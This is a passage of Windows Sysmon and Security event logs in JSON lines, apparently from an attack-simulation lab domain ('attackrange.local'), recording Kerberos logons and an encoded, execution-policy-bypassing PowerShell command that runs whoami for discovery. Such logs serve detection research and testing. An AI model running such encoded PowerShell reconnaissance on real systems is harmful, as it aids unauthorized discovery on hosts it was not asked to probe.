FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.265","ProcessGuid":"{A837DB8D-01DE-5F25-0000-0010C47A0400}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5rsjydy1.uk3.ps1","CreationUtcTime":"2020-08-01 05:47:10.265","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2529,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.312\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-0010C47A0400}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.312","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-0010C47A0400}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2530,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.312\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-0010C47A0400}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.312","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-0010C47A0400}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2531,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.374\r\nProcessGuid: {A837DB8D-01DE-5F25-0000-0010B29E0400}\r\nProcessId: 4620\r\nImage: C:\\Windows\\System32\\whoami.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: whoami - displays logged on user information\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: whoami.exe\r\nCommandLine: \"C:\\Windows\\system32\\whoami.exe\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-01DE-5F25-0000-00208A6B0400}\r\nLogonId: 0x46B8A\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9\r\nParentProcessGuid: {A837DB8D-01DE-5F25-0000-0010C47A0400}\r\nParentProcessId: 4444\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.374","ProcessGuid":"{A837DB8D-01DE-5F25-0000-0010B29E0400}","Image":"C:\\Windows\\System32\\whoami.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"whoami - displays logged on user information","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"whoami.exe","CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-01DE-5F25-0000-00208A6B0400}","LogonId":"0x46b8a","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9","ParentProcessGuid":"{A837DB8D-01DE-5F25-0000-0010C47A0400}","ParentProcessId":"4444","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2532,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2533,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76830,"ProcessID":856,"ThreadID":1272,"Channel":"System","Message":"The NetSetupSvc service entered the running state.","param1":"NetSetupSvc","param2":"running","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220360,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tSupplied Realm Name:\tattackrange.local\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"WIN-DC-881393$","TargetDomainName":"attackrange.local","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-1008","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220361,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-881393$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{04C18601-AA94-ABEA-872B-2951D72C9F2E}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40800000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-881393$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40800000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{04C18601-AA94-ABEA-872B-2951D72C9F2E}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220362,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x49DF8\r\n\r\nPrivileges:\t\tSeAuditPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeAssignPrimaryTokenPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-1008","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x49df8","PrivilegeList":"SeAuditPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeAssignPrimaryTokenPrivilege","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220363,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x49DF8\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{AD021F92-6053-473E-2996-E96C16F819EE}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t10.0.1.14\r\n\tSource Port:\t\t49702\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x49df8","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{AD021F92-6053-473E-2996-E96C16F819EE}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"10.0.1.14","IpPort":"49702","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220364,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x49DF8\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x49df8","LogonType":"3","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
